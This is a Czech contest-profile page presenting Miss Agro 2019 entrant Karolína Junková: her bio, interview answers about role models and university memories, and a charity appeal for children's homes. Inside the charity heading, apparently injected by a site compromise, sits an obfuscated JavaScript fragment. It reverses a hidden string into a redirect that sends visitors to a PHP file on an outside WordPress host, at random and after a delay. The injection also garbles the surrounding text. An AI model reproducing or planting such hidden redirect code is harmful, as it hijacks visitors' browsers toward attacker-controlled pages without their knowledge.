Karolína Junková

Profil

Fakulta: PEF
Obor: Hospodářská a kulturní studia (HKS)
Ročník: 3.
Věk:
23

Karolína je blondýna z Prahy, co se snaží být sama sebou. Má ráda růžovou barvu, takže se snaží na svět koukat růžovými brýlemi. Věří, že s úsměvem jde všechno líp, a taky tak ke všemu přistupuje. Vyrůstala jako jedináček, ale absenci sourozenců si bohatě vynahradila na dětských táborech. Na ty ostatně jezdí s oblibou dodnes jako vedoucí. Díky tomu se naučila vlídnosti i pevným nervům, jelikož práce s dětmi může být někdy náročnější než s dospělými lidmi. Baví ji na sobě pracovat a zdokonalovat se. Veškeré životní situace tedy bere jako prostředek k seberealizaci, a když to jde, snaží se k nim přistupovat s humorem a nadhledem. Proto taky ráda svým kolegům v marketingové agentuře vypráví vtipy, a to hlavně o blondýnkách. Svůj volný čas Karolína tráví nejraději sportem, a proto se podílí i na provozu fitness studia, kde působí jako lektorka. Většina lidí jí říká Kájo, ona však tvrdí, že slyší téměř na všechno. Takže až ji potkáte, tak to klidně vyzkoušejte.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2019?

Myslím, že každá z nás má co nabídnout a bylo by ode mě pošetilé myslet si, že zrovna já bych měla být něco víc. Nebudeme si nic nalhávat, bylo by samozřejmě milé získat titul Miss Agro 2019, ale mým prvořadým cílem je si soutěž užít. Přeci není důležité vyhrát, ale zúčastnit se. I když ta korunka by mi prostě slušela. (smích)

Máš nějaký životní vzor? Čím Tě inspiruje?

Ty jo, asi možná Wonder Woman? Vždyť byla členkou kmene Amazonek žijících na Rajském ostrově! Vedle toho si vypůjčila vlastnosti řeckých bohyní – být krásná jako Afrodita, moudrá jako Athéna. Co víc si přát? Ale asi ve skutečnosti je to moje mamka. I přesto čím si sama v posledních letech prošla, se snaží pro mě a celou rodinu dělat maximum. Jen se asi nesetkává s takovým vděkem, který si zaslouží. Znáte to, někdy člověk bere věci a skutky jako samozřejmost. Prostě je to máma superhrdinka!

Na který předmět na ČZU vzpomínáš nejvíce a proč?

Ráda vzpomínám na předmět Veřejná mínění a média s paní doktorkou Kreisslovou. Hodně jsme se zabývali obdobím komunismu, což jak všichni víme, není úplně příjemné téma. Nejvíce mě však oslovily rozhovory, které jsme pro úspěšné splnění předmětu museli udělat. Jeden byl s pamětníkem tehdejší doby. Povídat si s babičkou, jak celou dobu vnímala, co se jí konkrétně stalo, na co vzpomíná ráda, byl opravdu silný zážitek. Druhý byl ohledně fenoménu tehdejší doby – Spartakiáda, což už bylo úsměvnější.

Na co se v soutěži Miss Agro těšíš nejvíc?

Otázka, na kterou asi odpoví mnoho přihlášených slečen stejně, a to na nové zážitky, nová přátelství a také zkušenosti. Ano, je tomu samozřejmě tak, vzpomínky vám nikdo nevezme! Avšak já osobně se těším i na to, že snad překonám i sama sebe, své pochyby a možná i trochu stud. Že si rozšířím obzory, poznám nové lidi a užiji si to, je pouze bonus.